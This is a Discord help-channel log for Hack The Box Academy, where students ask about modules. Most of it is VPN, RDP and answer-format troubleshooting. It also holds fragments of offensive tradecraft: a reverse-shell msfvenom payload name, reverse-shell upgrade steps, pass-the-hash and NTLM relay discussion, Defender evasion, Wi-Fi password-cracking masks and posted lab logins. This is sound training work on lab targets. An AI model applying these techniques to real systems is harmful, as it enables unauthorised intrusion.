#modules

1 messages · Page 465 of 1

ashen prawn
#

it worked, thank you

rugged hull
#

Can I ask how you fixed this problem?

crystal sapphire
#

hey guys
I'm stuck at SQLi final exam , tested bunch of payloads including the HTB cheat sheet ones , but it is not working

desert cypress
#

Hello, I don't know if this is the right channel, but I'd like to do the AI red teamer path. I've started the first module, fundamentals of AI. I'd like to know how to approach this path. Is it necessary to know all the mathematical concepts perfectly or is just an overview enough? I have no particular knowledge of AI or the mathematics of data. The aim is to find out if I need to become a data scientist to do and above all understand the path 😅, Thank you in advance.

fathom pendant
#

Well the AI Red Teamer path is built on mostly the understanding of AI; I believe there's a few introductory AI modules (unsure if they're part of the path)

desert cypress
fathom pendant
#

not sure if much of the concepts get explained as I haven't done the path. Surely research/googling can yield some results ¯_(ツ)_/¯

desert cypress
#

I understand. In fact, as I was saying, I would have liked to know if I need to master all the concepts of ia perfectly, and therefore train upstream, before starting the path. Thank you anyway for your answer.

#

I don't have any time constraints, so I'm just going to launch it and see what happens.😅

brazen marlin
#

if anyone struggles with the password attacks - pass the certificate (confusing module) dm me i can guide in the right direction, there's alot of small details that aren't mentionned in the module

digital pendant
brazen marlin
hidden ledge
#

Hello, yet another post about the famous Exploiting Web Vulnerabilities in Thick-Client Applications but how are we supposed to get rid of compilation error of ClientGuiTest.jar when we have never touched java ?

#

I'm hardstuck :/

#

At this point of the section
javac -cp fatty-client-new.jar fatty-client-new.jar.src\htb\fatty\client\gui\ClientGuiTest.java

#

And debugging on laggy windows rdp session is a pain in the ass

rocky vigil
#

hello guys any hints for this section I'm stuck on it for days /module/171/section/1692

acoustic owl
#

Which one is Module 171? And which section do you work in?

rocky vigil
#

intro to nosql injection 1692

acoustic owl
#

Which section is 1692?

rocky vigil
acoustic owl
#

I do need a little bit of information to help you.

rocky vigil
acoustic owl
fiery light
#

can someone give me a hint about Linux Local Privilege Escalation - Skills Assessment, the method to get initial foothold without ssh password. What i did is i know the webservice, the domain, the version of the web, the port. However, i don't know which exploit can lead to initial foothold. THank alot

versed swan
#

#LFI
how solve assesment in CWES

coarse pine
acoustic owl
boreal basalt
#

Hi, i'm sry to ask but can someone help me find the version of gitlab on the **Gitlab - Discovery & Enumeration **section from the Attacking Common Applications module :

i found the second answer but i cant find this one i searched everywhere 😭

hidden ledge
#

if I remember well, gitlab version is visible in the /help endpoint but you have to be authenticated

lapis frigate
#

Hi

#

Access to the lab environment to complete this part of the lab will be a bit different. We are using XfreeRDP to provide us desktop access to the lab virtual machine to utilize Wireshark from within the environment.

We will be connecting to the Academy lab like normal utilizing your own VM with a HTB Academy VPN key or the Pwnbox built into the module section. You can start the FreeRDP client on the Pwnbox by typing the following into your shell once the target spawns:
Code: bash

xfreerdp /v:<target IP> /u:htb-student /p:HTB_@cademy_stdnt!

You can find the target IP, Username, and Password needed below:

Click below in the Questions section to spawn the target host and obtain an IP address.
    IP ==
    Username == htb-student
    Password == HTB_@cademy_stdnt!
#

Can someone help me with this

storm elk
#

What is even your question?

lapis frigate
#

Dude

storm elk
#

Read that

lapis frigate
#

xfreerdp /v:<target IP> /u:htb-student /p:HTB_@cademystdnt! I used this

storm elk
#

Still not seeing a question

lapis frigate
#

Ok

hidden ledge
#

Me either

boreal basalt
lapis frigate
#

Answer the question(s) below to complete this Section and earn cubes!

Target(s): Click here to spawn the target system!

RDP to with user "htb-student" and password "HTB_@cademy_stdnt!"

  • 2 What was the filename of the image that contained a certain Transformer Leader? (name.filetype)
boreal basalt
#

hacker:Welcome but i doesnt work

hidden ledge
#

create one

#

if you can

lapis frigate
#

This is

boreal basalt
#

oj

lapis frigate
#

The question

boreal basalt
#

ahahaha

lapis frigate
#

Seccion is this: Packet Inception, Dissecting Network Traffic With Wireshark

hidden ledge
lapis frigate
#

Because it has to don with connecting with this

#

xfreerdp /v:<target IP> /u:htb-student /p:HTB_@cademy_stdnt!

#

It tells me to use a vpn file to my machine

hidden ledge
#

Ok this it a bit more clear

lapis frigate
#

This is what I've done

storm elk
#

So have you downloaded the vpn file and connected to it?

lapis frigate
#

But then it tells me to connect me to 172.16.10.2 with the following credentials

#

Yes

#

And it doesn't work

storm elk
#

Can you share a screenshot or so

lapis frigate
#

I can't

#

I don't have permissions

hidden ledge
#

Damn

storm elk
#

Can you cope/paste the errro?

#

You should see it in your cli

lapis frigate
#

Okay

hidden ledge
#

The IP you provided is not the one you should connect to

#

IP provided by htb are of format 10.x.x.x

lapis frigate
#

Aaaah.

#

You mean the ip of the pwnbox

#

Wait. It doesn't make sense

hidden ledge
#

The ip displayed when you click on "spawn instance" just above the questions

#

Just like this.
You are actually talking about the internal network ip. You will have access to it once you are connected to the instance.

lapis frigate
#

Aaaah

#

Okay

storm elk
#

Please don’t use that word @lapis frigate

#

It’ll get you auto muted

lapis frigate
#

Yeah

#

Hahaha

#

Thanks eh

storm elk
#

No worries 🙂

heady sapphire
#

Where can I find the official cpts preparation track (list of practise machines ) ?

coarse pine
#

I want the same thing for CWES

acoustic owl
wary marsh
#

Where does weight help in an activity?

lucid forum
#

Hello, for some reason, on the Windows fundamentals module, I try to connect to the vpn using the way I always have but now for some reason the vpn won't ping back

wary marsh
#

I've tried everything, even GPT couldn't help me.

lucid forum
#

Also the target IP addresses are not spawning.

#

ok the IP target spawned finally, I try to connect to vpn and it says "initialization sequence complete" but it won't ping the target IP

trim frost
trim frost
wary marsh
trim frost
trim frost
# wary marsh yes

so I'd expect that the answer is based on details on that page, so either ssh keys exposed or sudo, did you check those things?

#

also download and run linpeas, that should help you identify a way in

fathom pendant
trim frost
fathom pendant
#

And I believe its a public_ip:port, making file transfer all the more difficult. Since their containers are more locked down

#

[Ik scp works]

trim frost
#

or copy paste

coarse pine
wary marsh
trim frost
lucid forum
#

On this module https://academy.hackthebox.com/module/49/section/454 I am using a Kali Linux VirtualBox, I've tried connecting to the vpn the same way as before but nothing seems to ping back. Also, I try running this command xfreerdp3 /v:<targetIp> /u:htb-student /p:Password and the Windows desktop will pull up but then it shuts off in 5 seconds.

#

am I missing something?

ocean night
#

Multiple connections with the same OVPN config will "fight" against each other

lucid forum
#

no pwnbox connected

ocean night
hollow wind
lucid forum
#

Connection appears to be fine

ocean night
#

Wait a minute or two, do you see another "Initialization Sequence Completed" message?

lucid forum
#

if i try to ping the target IP, nothing comes back

hollow wind
#

Okay, in my case I can ping the target IP fine, RDP works fine from the PwnBox, HOWEVER, the moment I use my own kali VM via the vpn to try to RDP to the target machine instead of the PwnBox, I am unable to do it. I have tried with xfreerdp, rdesktop, and remmina and none of them work no matter which security settings I have configured.

ocean night
#

Ok one thing at a time 😅 but sure, @hollow wind is your Pwnbox still running? If so, terminate it

#

@lucid forum which VPN server are you connected to?

lucid forum
#

academy-regular.ovpn

coarse pine
#

dude someone in the support terminate my plan and I did not told him to do that

#

this is rude

ocean night
compact patrolBOT
hollow wind
jovial walrus
#

for host 1 on shells and payloads skills assessment how do we get to know what payload type to give to msfvenom
in this case we gave|| java/jsp_shell_reverse_tcp||
but there r many more java payloads compatible with war so do we experiment with all ?

ocean night
lucid forum
#

not sure what you mean srry lol

ocean night
#

Ok, it's fine

lucid forum
#

I use sudo openvpn academy-regular.ovpn command in kali linux machine

ocean night
#

I see you now.. youre connection keeps on reconnecting, suggesting you may have multiple openvpn clients running at the same time

#

Easiest option, reboot your VM you're working from and reconnect fresh

#

Sometimes openvpn can drop into the background (the client process), resulting in multiple clients trying to connect at the same time

#

You could try sudo killall openvpn first

#

and the reconnect

lucid forum
#

I tried sudo killall

ocean night
#

Can you start the openvpn client again please?

#

Ok I see a ping response from you now

blissful agate
#

Are you still working on those? I just finished it if you had any questions.

lucid forum
#

I restarted the machine, openvpn is running

ocean night
#

Are you able to reach your target now?

#

(without it dropping after 5 seconds)

lucid forum
#

nope

#

no ping response

ocean night
#

Can you stop and start the target perhaps? You're still on the same VPN server..

#

Sorry, doing the best I can here.

lucid forum
#

all good, you want me to close the vpn and reopen too?

ocean night
#

No the VPN can stay open

#

You'll want to stop the target on the Academy

#

and start it again, then try the new IP

hollow wind
#

Issue persists, black screen for around 20 seconds and then it times out

lucid forum
#

target IP is taking awhile to restart lol

ocean night
#

It can sometimes, it'll get there

lucid forum
#

I wonder if it's just my ISP being slow and there is nothing I can do about that :/

ocean night
#

Ping from the VPN to you is not horrendous

#

The target has still not come up?

lucid forum
#

nope

#

target took so long it gave up

ocean night
#

Did you just try to spawn it again @lucid forum ?

lucid forum
#

it finally came up and still no ping response to target

ocean night
#

IP ending in 162?

lucid forum
#

yup

ocean night
#

Strange, route is stable between you, the VPN server and then to the machine.. Honestly I'm not sure what the issue is.

#

Can you ping 10.10.14.1?

lucid forum
#

yes

ocean night
#

And there's no conflicting route locally with the 10.129.0.0/16 subnet?

#

I mean you should've seen errors in openvpn if there were

lucid forum
ocean night
#

I'm sorry.. I've no idea why you cannot access the target IP from your VPN connected Kali instance.

#

The routes look to be fine, the VPN can reach you, and it can reach the target

lucid forum
#

I've never had this problem before

#

Maybe the box hacked me! 😱

ocean night
#

All I can say is, please can you speak with support.. sorry, I thought we'd have this fixed by now

hollow wind
#

Hey goblin, you got a sec to check out this issue im running into?

ocean night
#

Sorry but it's like midnight

#

This isn't even my job

hollow wind
#

oh lol

ocean night
#

I just like to try to help when I can

hollow wind
#

go get some rest haha

#

thanks anyways

ocean night
#

Support is your best bet, sorry

compact patrolBOT
hollow wind
#

No worries, ill reach out to them 👍

wide jungle
#

hey, is anyone's guestmount command working? The command seems to be missing for me even when reinstalling it

cyan veldt
#

and when I curl I dont get the same result in the section

fathom pendant
cyan veldt
#

ive blocked it in my browser but same curl result

#

how can i block it in curl

fathom pendant
#

the issue with curl is a separate thing; i've led you to part of the answer (network requests) investigate that further 😉

#

(note it's not a bug with curl, curl doesn't care about fonts)

worn swallow
#

Im experiencing error in purchasing a cube. It says my that transaction was declined.

#

"Transaction was Declined, please contact support."

Even when i use my other card. It pops up and error

ocean night
#

For billing issues, you'll need to reach out to support @worn swallow

compact patrolBOT
worn swallow
#

Thank you sir

ocean night
#

Billing is something cannot help you with on Discord, apologies

heady sapphire
#

Which inveigh.exe should I use ?

ocean night
heady sapphire
#

There are so many different .net and there is also native and trimmed

fathom pendant
cloud urchin
#

protip: copy the tools from the machines on htb

ocean night
#

...or do that

fathom pendant
#

well... if they were tested with that version :D

ocean night
#

I'm agreeing with you

#

🙂

heady sapphire
cloud urchin
#

they're different releases so like g0blin said you need to pick what works for your os and architecture

ocean night
#

nativeaot being smaller to be suggests it uses libs available on the target

#

with trimmed-single being large being inclusive

#

That may be completely incorrect however

#

Experiment and test I suppose

fathom pendant
#

(this is assuming you're using your own machine)

heady sapphire
fathom pendant
#

yoink = steal/pillage/take

ocean night
#

Did you shout or something Marcie? I didn't think my answer was completely stupid 🤣

fathom pendant
#

I took the Inveigh.exe that's on the C:/tools/ folder from the windows modules

fathom pendant
heady sapphire
#

I believe the port forwarding cheat sheet about reverse port forwarding has a mistake

#

This is the command they give : <InternalIPofPivotHost>:8080:0.0.0.0:80 user@<ipAddressofTarget> -vN`

#

And this is the description : Reverse SSH tunnel from target host to attack host. Traffic is forwarded on port 8080 on the attack host to port 80 on the target.

#

I believe it’s the opposite . The description does not make much sense anyways

late cargo
#

Any nudge towards first question in Windows Lateral Movement Skill Assessment, what should I be looking for? So far I tried ssh, rdp (not on default port as well), web browser PS, smb, dcom but no luck so far

late cargo
#

as in, enumerate services (did that) or websites?

autumn pilot
#

You have been given a set of credentials, if you enumerate carefully you will find where you can use them

#

And the answer is within the explanation in the initial question you've asked

fathom pendant
#

Module is above tier 0 @chilly night, please try not to spoil.

limber surge
#

hi, on LINUX PRIVILEGE ESCALATION > Linux Local Privilege Escalation - Skills Assessment

can someone help me in the right direction to find flag5.txt? i have flag4.txt answer already but i have no ideal what the next approach

is it got to do with sudo -l approach? i tried that but does not seem to work

fathom pendant
coarse pine
#

I didn't understand🥺

#

is that a module

earnest pasture
rustic sage
#

Hi. Im' studying the Bypassing Web Attacks -> Basic Authentication module (https://academy.hackthebox.com/beta/module/134/section/1175). From the pwnbox I'm trying to execute "curl -i -X OPTIONS http://94.237.120.137:45455/" but i don't get server accepted methods:

HTTP/1.1 200 OK
Date: Fri, 12 Dec 2025 08:42:58 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1210
Content-Type: text/html; charset=UTF-8

[body response]...

I've already tried to restart both pwnbox and target without results. Any hint?

#

The response header should contains: "Allow: POST,OPTIONS,HEAD,GET"

karmic tundra
#

Hi, I'm on module Attacking Authentication Mechanisms -> OAuth

In the module Attacker Server (attacker.htb) was mentioned. Also in the target system spawned it shows
OAuth Client Routes: here
OAuth Resource Server Routes: here
OAuth Authorization Server Routes cannot be interacted with directly
Attacker Server (Remember to add the port): http://attacker.htb:PORT/

Is the attacker server accessible, if so what is the port? or I should be hosting the server?

coarse pine
karmic tundra
coarse pine
#

sorry can't help in that

karmic tundra
#

no worries. but do you understand my question? Not sure I was clear

coarse pine
#

I think you have to add the port and the domain name in /etc/hosts?

ocean night
#

You don't need to host anything on your Pwnbox or machine

karmic tundra
karmic tundra
coarse pine
#

wow!!

ocean night
#

Not my call

coarse pine
#

🥺 .

median gale
#

Perform an attack against the Wi-Fi network "Inlane-Management". What is the password obtained for user "peter"? and Connect to the "Inlane-Corp" Wi-Fi network and navigate to the gateway at "172.27.0.1" to retrieve the flag. Submit the flag as your answer. in particular

teal root
#

Can someone help with the Intro to Windows Evasion -> Static Analysis. Cant complete the first evasion challenge. Windows defender keeps identifying it

I copied the code directly incase i messed up somewhere, I ran threatcheck and it seems to be triggering on my AES calls, so I modified the decryption function to hopefully bypass any static signature but nothing is working.

ThreatCheck shows some wall of text but not sure what exactly inside it is triggering, especially since ive changed it a few times

fathom pendant
fathom pendant
fathom pendant
median gale
coarse pine
#

I will start my first CTF challenge

fathom pendant
coarse pine
#

🥺 .. I am nervous

#

I am with a team that I don't know a single person

fathom pendant
coarse pine
#

okay

#

it started now

#

bbyyeeeee

#

love you

#

if I win I will pay you

gray yacht
#

If this is related to a CTF and not a module, this is not the channel to post this content.

elfin nacelle
#

good morning. very new to this and learning which chat I should go to for this. I am in the HTTP request section and asked this: Send a GET request to the above server, and read the response headers to find the version of Apache running on the server, then submit it as the answer. (answer format: X.Y.ZZ) not certain what to put in. I have tried GET ip of server and ip with port#, but can't seem to get the answer

thin frigate
#

In your response you should get something like server:apache/x.x.x

coarse pine
#

Nice my eyes glass broke

#

I can't even see!!!!

#

can anyone help me

fathom pendant
elfin nacelle
#

still not accepting though

fathom pendant
#

also don't post answers

#

it's just asking for the version number format

elfin nacelle
#

oh okay sorry

fathom pendant
#

so x.y.zz

#

so like 1.0.00

elfin nacelle
#

I did that but still didn't take

fathom pendant
#

dm me with what you submitted

elfin nacelle
#

could you dm me instead. I am having too many issues trying to figure this out

fathom pendant
#

I genuinely don't care if you don't place high, then that's more on your team than it is on you as a person.

tidal bobcat
#

can someone help me with the Applications of Ai in Infosec module?

weak pivot
vapid maple
autumn pilot
#

Yes, you will be presented with the flag if you complete the task successfully

vapid maple
#

so we have to wildly guess? gotcha

vapid maple
#

okay I figured out the first two, but the last question

Exploit a flaw in the web application to steal the trained model. Submit the file's MD5 hash as the flag.
with the hint to look int the html code

I dont see it anywhere

#

nvm, I see it now

fresh moth
#

a quick question in the Attacking Common Services -Attacking DNS they are explaining the ettercap method .. which can only be done locally via lan right? since we are connecting via a vpn thats not possible right?

fresh moth
#

there is a typo at subbrute part in attacking common services ive marked them

cloud urchin
raven spruce
#

"Attacking FTP" box Q 1, on which port FTP service runs on.

You type 21, and get wrong answer. Very funny.

2121

coarse pine
#

I am cookedNotLikeThis

digital pendant
coarse pine
digital pendant
shadow quail
#

Hello guys, i would like to ask about problems with submitting the flag as the answer. What else can I do besides resetting the machine? I’ve been trying for a while and looked for other possible answers, but I think there might be something wrong with how the flag submission is being handled.

ocean night
#

Maybe you went a bit too deep too quick 😅

silk lagoon
#

Or you have a space

ocean night
#

No

#

It's what I said

shadow quail
ocean night
#

You connected to port 22

#

Is that the port listed in your target?

fierce oyster
# ocean night Is that the port listed in your target?

it was the intro to pen testing module and basically just said use what you learned, which was basically just using netcat to see what was running on port 22 (obviously ssh), but the versions are different so it throws the answer as wrong.

ocean night
#

You had to spawn your target

#

That is the IP and port you need to work against

#

22 is indeed the usual SSH/SFTP port, but your target may not always match the ports in the content due to how we host the interactive portions

#

Take a look at where your Target IP is specified, just above the question

#

🙂

fierce oyster
#

Thanks

ocean night
#

No problem!

cloud urchin
#

@fierce oyster Please take care not to post answers

fierce oyster
cloud urchin
#

Yeah but that may spoil it for some

chilly night
#

i just wanna say the parrot machines on the "shells and payloads" module are really slow. also on some other modules

#

not fun to use

cloud urchin
#

VM is always going to be a better experience

chilly night
#

i usually use my own vm but for this module you have to use the ones given, i think

cloud urchin
#

ahh yeah there are some like that, you can usually pivot through still though

chilly night
#

whats your favourite way to pivot other than ssh

#

favourite way to port foreward rather

left needle
#

In password attacks module, section pass the hash why was I able to view the shared resources of david when used mimikatz from windows but was not able to view shared resources of david when used impacket-psexec for david it says access denied @fathom pendant @cloud urchin

fathom pendant
left needle
#

if I am in AD environment does it makes any difference because I am essentially having privileges of the same user david in both the cases when using mimikatz I am already an admin and then moves laterally to david and using impacket i just hops from my linux machine to the user david ??

fathom pendant
#

you'd need to pass along the hash through a connection like a tunnel/pivot

left needle
#

Thank you

wicked oxide
#

Hello all !
Anyone available for some questions about the SA of Advanced SQL injections please 🙏

wicked citrus
#

Hey everyone, I'm on the final question of the "Pass the Ticket from Linux" module. I've successfully authenticated as the LINUX01$ machine account, and klist shows a valid ticket. However, I'm blocked from there when trying to access the \DC01\linux01 share. Any hints on what I might be missing? Thanks

pastel basin
#

Hello everyone , I stuck in the module called "shells & payload " in the section called " Infiltering unix/linux " the payload of rconfig as shown in the section is not working can anyone help me ?

gray yacht
#

Did you create a listener on that agent correctly? You can DM what you setup.

snow relic
#

Yo need a hint with Windows Lateral Movement SA Q1, I have enumerated all port and try ssh, rdp , smb and dcom but no luck so far

stark hedge
#

Could anyone help me with Crackmapexec skills assessment Q3 please?

gray yacht
snow relic
gray yacht
gray yacht
gray yacht
clever lance
#

Hey all, I'm doing the Footprinting Labs - Medium, and I've enumerated quite a few things thus far, i.e in short, nmap to view ports opened, found the 'xx' credentials and tried connecting with ssms with various connection options and failed, I can RDP into the target with the account credentials I also found, I tried other tasks from the module with no luck.
I can search past messages on this topic, but i don't want to as I might see the direct answer, and I just want a nudge in the right direction.

fathom pendant
clever lance
fathom pendant
#

i think the 'hint' on the Q points at this

tranquil moat
#

I'm doing the Finding Files and Directories section of Introduction to the Windows Command Line, on the second task it asks me to find a file named waldo.txtx, i've tried using where with the /r switch to make it recursive but i still haven't got any result, may anyone help?

fathom pendant
heady sapphire
#

What exactly does the run as command do ? It lets you run commands as another user ? Also this applies only to network resources such as shares or also local recourses e.g. local directories such as administrator’s desktop

fathom pendant
# heady sapphire What exactly does the run as command do ? It lets you run commands as another us...

runas is like sudo; runas also, in the context of windows, allows you to run things as a specified user, they can be a local or remote user https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11)

sudo also does the same thing; sudo -> switch user and do; the default for sudo is root but you can use -u to specify a user

so sudo -u someuser /bin/bash (if you have the permissions to run, as that user)

#

@dull solar your message was removed because your screenshot contained an answer

dull solar
#

So can I crop and resend?

fathom pendant
#

it helps to provide the module and section name

dull solar
#

Module: Network Traffic Analysis Section: Fundamentals Lab

#

||"How do you start a capture with TCPDump to capture on eth0?"||

fathom pendant
#

thumbs_up_sparkle i'll check bc i believe i did that one and i think it's a case of formatting

dull solar
#

Oki

fathom pendant
#

no sudo

dull solar
fathom pendant
#

your image had sudo 😉

#

refresh the page and try again

dull solar
#

Ty

vast cairn
#

Does anyone have a suggestion for how to proceed with the DnsAdmins on Windows Escalation? I didn't see anyone reply to my last request, and I've been stuck at this for like a week now. after loading the adduser.dll it lets me add netadm to the DnsAdmins group, but I still don't have privilege to grab the file from the Administrator directory

vast cairn
vast cairn
# cloud urchin DM me

Thank you for your help! It turns out I was doing it right, just needed the right way to access the file once I had permission.

night shale
#

Hihiii, can someone help me with password attacks skill assessment?

twilit jewel
#

Anyone available for DM on the Active Directory BloodHound module? I have a question on the "Nodes" Section question 1 (To which computer is user Sarah, an administrator?). I have the answer, but I'm not seeing something in BloodHound that I expect to see.

loud pine
#

[NEVER MIND! SOLVED!] Hello, I am doing the Manipulating the Model module from the Introdiction to Red Teaming AI track. I need to download the code/files from a Resources section but can not find that section in the page, where is the Resources commonly found?

blazing nova
#

Howdy! I am currently doing the Detection & Analysis Stage (Part 1) section in the CJCA path. I am attempting to answer the second question which says, "Assign the Mimikatz alert (shown in the section) to yourself in TheHive, and go through the description and summary. Provide the username of the person who executed the Mimikatz tool. The answer format is "domain\user_name." I have a few times put the following in the browser in Pwnbox: [IP]:9000 but the TheHive page never appears. Is anybody having the same issue?

fathom pendant
blazing nova
fathom pendant
#

are you doing http or https?

#

also of course dropping the brackets so something like https://10.129.x.x:9000

blazing nova
#

Ah! I see the problem! The browser was forcing it to use https. I reverted it to http and it works.

fathom pendant
#

Ah yeah that'll do it

cyan veldt
#

it should be /; ls but it doesnt work

brave field
spiral surge
#

hello can someone help me answer this question i am stuck here for about days and i didnt find the answer : Assign the Mimikatz alert (shown in the section) to yourself in TheHive, and go through the description and summary. Provide the username of the person who executed the Mimikatz tool. The answer format is "domain\user_name." its from the incident response lab

low topaz
#

Inlane_ is a prefix and the password should be at least 10 characters.
So you can try -a 3 'Inlane_?a?a?a'

fathom pendant
#

Or put a \ before to escape it

low topaz
echo agate
#

I am getting this exact same error. I can access the webpage at port 80 but the /nibbleblog url returns the Net::ReadTimeout error. Were you able to resolve it? I tried resetting the target a couple of times but i get the same error.

dusk holly
#

i was able to solve FootPrinting module medium and hard labs with one hint for each one, is it good?

forest mountain
#

anybody else havign problems with htb vpn session timin gout

#

im close to losing my mind

#

as if learning this stuff isnt hard enough

fathom pendant
#

it's easy for the medium lab to overlook something that's obvious in hindsight

dusk holly
#

too much focus on commands

fathom pendant
floral talon
#

Going through the SIEM module, it is said that the following image is a demonstration, but there is a codeblock instead of an image. I can understand what the goal is, but is this intended?

fathom pendant
fathom pendant
floral talon
#

Oh yeah, it was the beta issue :D

fathom pendant
dusk holly
# fathom pendant if it was bad to use hints, they wouldn't exist

right, they are pretty useful, actually i think i did this module's lab pretty good this time, because this is my second time going through CPTS, and first time didn't take notes, gone through all the modules very fast and didn't even understand most of the content.

fathom pendant
dusk holly
summer sable
#

For the module Information Disclosure what is the flag: "After executing an introspection query, what is the flag you can exfiltrate?" I have done all modules and the Skill Assessment, but i dont understand which could be the answer

fathom pendant
#

@fallow sable the module is above tier 0; don't paste anything like that. make sure you pay attention to ports

fallow sable
fathom pendant
fallow sable
#

I understand, thanks

digital pendant
#

Anyone tried installing Nessus recently? Guidance in Vulnerability Assessment module doesnt match the installation route now.

For example this is the nessus installation options - there isn't an essentials? Unless im going mad

cloud urchin
#

They have nessus installed on a box for you to use if you don't want to go through all that I think.

#

also i don't really remember, but you may just be able to pick one and move through the installation and if it asks for a key or something you skip or don't do it, then it just becomes free version maybe?

#

they do still have the essentials version

digital pendant
#

yeah I picked a couple and it rejected the key, and then went into Nessus Manager was only one that accepted the key, I signed up for Essentials as the docs online suggest. Weird one - I have no functionality like new scans 😄

#

Unfortunately the module lab isn't enough, need this on my machine as I want to do this for my report

vale geyser
#

Does anyone else suffer with a super instable RDP Connection to Windows machines (like in Windows Privilege escalation). Although this only is the case when using the VPN (in the PWN Box everything is fine). I already went through all of the EU VPNs and there is no improvement

digital pendant
vale geyser
#

yes

digital pendant
#

when you say unstable ,does it kick you off the connection every now and then ?

vale geyser
#

it kicks me out or sometimes doesnt even establish a connection

digital pendant
#

I get this as well, have got it across many modules, didnt happen for me in the exam tho

#

It is extremely annoying

vale geyser
#

yeah i heard the exam environment is stable

#

but yeah this is really anoying and it basically takes longer trying to get a connection, then to actually completing the task for the section

digital pendant
#

Sometimes ive found my keyboard pasting can be the issue, +clipboard has differing results sometimes I try with and without /drive: etc, crashes sometimes when transferring files, sometimes it crashes when running scripts, ofc when you eventually get back into the RDP window, nothing was impacted and scripts still run etc

#

Although instead of tempting fate and switching rdp between users, I tend to use runas /user:user if the target user is on the same device/same domain. Otherwise yeah have to switch and roll the dice again

vale geyser
#

then it works

digital pendant
#

yeah noticed that too, interestingly if you are pasting into a powershell window, make sure you are not tabbed into the RDP window (like its not opened/active) then if you right click the pws window and paste, it most often pastes first time. if the rdp window is active, it fails least 70% of time 😄

fallow sable
#

Step 1: Read the blurb at the top of the module page, don't skim read - it gives you pertinent info! Wow. Could have saved myself two days of testing.

forest mountain
#

hey can someone help me please im about to lose my mind. ive been trying this since 5 hours with no solution

#

im trying to convert to a tty shell

#

what am im doing wrong

#

normally the next step would be fg in foreground

ocean night
#

Is that for an academy module, or what?

forest mountain
#

its nibbles

#

the beginning

ocean night
#

Ok, best to include the module name when asking for help 🙂

forest mountain
#

ok yeah will do but should be a basic operation upgrading the shell no `?

ocean night
#

Wait, Nibbles is a machine isn't it?

forest mountain
ocean night
#

Ok, fair enough - I was not aware it was included there.

forest mountain
#

look i just need help upgrading the shell

#

are you a moderator no ?

ocean night
#

No, I'm staff, was just advising to include information about what you're struggling with, specifically the module name

#

It helps others to help you. I'm afraid I'm unable to help with content

#

So I don't think you can just bg/fg like that in an upgraded reverse shell

#

It's "upgraded", but still not a true shell

fathom pendant
#

stty raw -echo; fg is the common solution to the problem

ocean night
#

takes notes

#

That's not mentioned in that section though, like stty as a part of the shell upgrade process

forest mountain
fathom pendant
#

it's in the 'types of shells' section from that module though in the module it's written as

www-data@remotehost$ ^Z

MarcieLee@htb[/htb]$ stty raw -echo
MarcieLee@htb[/htb]$ fg

[Enter]
[Enter]
www-data@remotehost$
fathom pendant
forest mountain
fathom pendant
ocean night
#

Was focused on the mentioned section too much, mb.

fathom pendant
#

np i always forget about it too, had to look it up bc it trips me up (i never really bothered with the upgrade)

forest mountain
fathom pendant
forest mountain
#

omg it worked

#

you saved my sanity

#

thanks

fathom pendant
#

i, also, don't use kali lol i use parrot which uses bash as the default shell -- not zsh

forest mountain
#

do i always need to downlaod a new conection file for vpn when doing a new module ?

ocean night
forest mountain
#

ok thanks

echo agate
#

I am stick at Nibbles - Web Footprinting from the Getting Started module. I can access the target in the browser and can see the /nibbleblog reference in View:Source. However when i try to run whatweb on the target, i get a weird timeout error - Net::ReadTimeout error. I have seen references to this error on this forum and elsewhere with no resolution. I have tried resetting the target a few times to no avail. Can someone shed some light on this issue?

I have the Silver Annual subscription. I am not on the VIP plan. Does this have anything to to with this? Thanks !

fathom pendant
#

VIP and Silver Annual are on separate platforms, so no

forest mountain
#

maybe typo ?

violet plume
#

Hey guys! Good evening! Im on system information on the academy, do I have to download the VPN connection file to ssh into “htb-student” password “HTB-@cademy_stdnt!”

#

Im running on a mac m3, so idk how i would do that, unless i need to connect to a hypervisor that is running linux etc… im assuming thats what i need to do?

cloud urchin
#

VM is probably going to be the best way, yes. parrot/kali are good. you'd need to connect to the VPN to access the private subnet.

violet plume
cloud urchin
#

oh yeah, you can use the pwnbox too

#

but you only want to use one, the vpn or the pwnbox. one or the other, not both at the same time. they use the same IP

#

within the pwnbox you can open a terminal and ssh

violet plume
#

I dont necessarily want to google it, cause that would be cheating

echo agate
# forest mountain send the whatweb request in here

┌─[user@parrot]─[~/work/nibbles]
└──╼ $whatweb http://10.129.218.33
http://10.129.218.33 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.218.33]

┌─[user@parrot]─[~/work/nibbles]
└──╼ $whatweb http://10.129.218.33/nibbleblog
http://10.129.218.33/nibbleblog [301 Moved Permanently] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.218.33], RedirectLocation[http://10.129.218.33/nibbleblog/], Title[301 Moved Permanently]
ERROR Opening: http://10.129.218.33/nibbleblog/ - Net::ReadTimeout

echo agate
violet plume
#

Im stuck on the academy, page 6 of linux fundamentals,

What is the path to the htb students mail? Can i use google for this?

“What is the linux file path for mail?”

But can i do this without google :/?

am i missing something in the lesson?

long flint
#

any nudge for attacking ai - application and system skills assessment?

i've got the ||platform, password|| already, and tried every function that I thought would work to make something potentially show up in the logs. I've also tried things like sql injection and command injection, but to no avail. It looks like it could be ||LFI|| but that failed on me as well

ocean night
echo agate
autumn pilot
#

You can use Google for it, however, don't forget to establish an SSH session with the target

blissful folio
#

OSI, on the other hand, is a communication gateway between the network and end-users. The OSI model is usually referred to as the reference model because it is newer and more widely used. It is also known for its strict protocol and limitations.

Im pretty sure TCP/IP is more widely used.

This is Introduction to Networking , section Networking Models

thin flicker
feral adder
#

In the assessment part of broken authentication is it designed to redirect in the /login.php despite having the the OTP?

feral adder
#

nvm I was able to figure it out.

hasty mauve
#

Module: NTLM Relay Attacks
Section: NTLM Cross-protocol Relay Attacks
Question: Use impacket's SOCKS server to hold NPORT's relayed connections and abuse them to access the MSSQL service at 172.16.117.60; query the 'flag' table within the 'development01' database and submit the flag.

I keep getting this error:
Connection against target mssql://172.16.117.60 FAILED: [('SSL routines', '', 'no protocols available')]

Any help?

hasty mauve
#

nvm fixed it.

lapis sky
#

Module: Sqlmap Essentials
Section: Attack Tuning
What's the contents of table flag6? (Case #6)

i solved the question, but i was just confused because i thought i solved it in a different way, i only used level and risk and other options without using prefix, but still got the flag is it normal? or i should've used the prefix?

thin flicker
heady sapphire
#

